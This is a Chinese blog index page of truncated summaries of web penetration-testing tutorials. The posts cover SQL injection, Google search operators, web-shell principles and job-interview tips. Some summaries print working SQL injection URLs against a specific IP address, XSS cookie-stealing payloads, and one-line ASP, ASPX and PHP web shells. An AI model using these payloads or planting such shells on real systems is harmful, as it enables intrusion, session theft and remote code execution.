摘要: 二、手工注入 第一步:找到注入点 在变量可控的部分加入一些符号,查看页面是否正常,举个例子: 有这么一个网站www.example.com/index.php?id=1 可以看到,这里的id变量是用户可控的,可以在id=1后加一个单引号,变成id=1' 。页面如果报错多了一个单引号,那么说明可能存在 阅读全文
posted @ 2019-07-17 12:21 wudixiaoherry 阅读(799) 评论(0) 推荐(0) 编辑
摘要: 1、数字型注入当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。测试步骤:(1) 加单引号,URL:www.text.com/text.php?id=3’对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就 阅读全文
posted @ 2019-07-17 11:26 wudixiaoherry 阅读(706) 评论(0) 推荐(0) 编辑
摘要: http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select database()),0x7e),1)--+http://219.153.49.228:44580/new_list.php?id 阅读全文
posted @ 2019-07-15 13:50 wudixiaoherry 阅读(328) 评论(0) 推荐(0) 编辑
摘要: site:url.com '查看这个站点上的信息最好不加www,可以查看到不少的二级域名信息,可以有不小的收获哈最好与inurl,intext等联用,效果更佳.. intext:测试 '查看文本种包含"测试"的网页intitle: fooltitle '标题 intitle:config confi 阅读全文
posted @ 2019-07-15 13:50 wudixiaoherry 阅读(532) 评论(0) 推荐(0) 编辑
摘要: '><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable) 阅读全文
posted @ 2019-07-15 13:49 wudixiaoherry 阅读(112) 评论(0) 推荐(0) 编辑
摘要: sql 注入一、如果发现某一个网站可能存在sql注入(步骤)1、判断存在什么方式注入(数字、字符)(具体步骤 and 1=1 and 1=2) union 联合注入(前提是页面必须要有显示位) 判断列数:order by 1,2,3,4,5,6.......--+ 判断显示位:(前面的语句必须是错 阅读全文
posted @ 2019-07-15 13:47 wudixiaoherry 阅读(457) 评论(0) 推荐(0) 编辑
摘要: 笔者作为网络安全的初识者,从求职者的角度总结了一点点关于渗透测试工程师求职面试的要点给即将毕业的大学生(实习生和应届生)予以参考,以便能更好更快地找到一份自己满意的工作。总结基于笔者本人的几次面试经历,都是自己投简历(广州的几家公司),没有校招。这里简单介绍一下:我自学web渗透和Android逆向 阅读全文
posted @ 2019-07-15 11:13 wudixiaoherry 阅读(227) 评论(0) 推荐(1) 编辑
摘要: 一、原理简述 对于不同的语言有不同的构造方法。 基本构造:最开头构造的是脚本开始的标记 核心部分:获取并执行得到的内容,通常类似eval、execute等 被执行内容:一般是http等协议接受的值,通常类似request、$_POST等 如果我们通过客户端向服务器发送被执行内容,那么就会让服务器执行 阅读全文
posted @ 2019-07-15 09:55 wudixiaoherry 阅读(600) 评论(0) 推荐(0) 编辑
摘要: asp的一句话是:<%eval request ("pass")%>aspx的一句话是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>php的一句话是:<?php @eval($_POST['pass']) 阅读全文
posted @ 2019-07-15 09:51 wudixiaoherry 阅读(141) 评论(0) 推荐(0) 编辑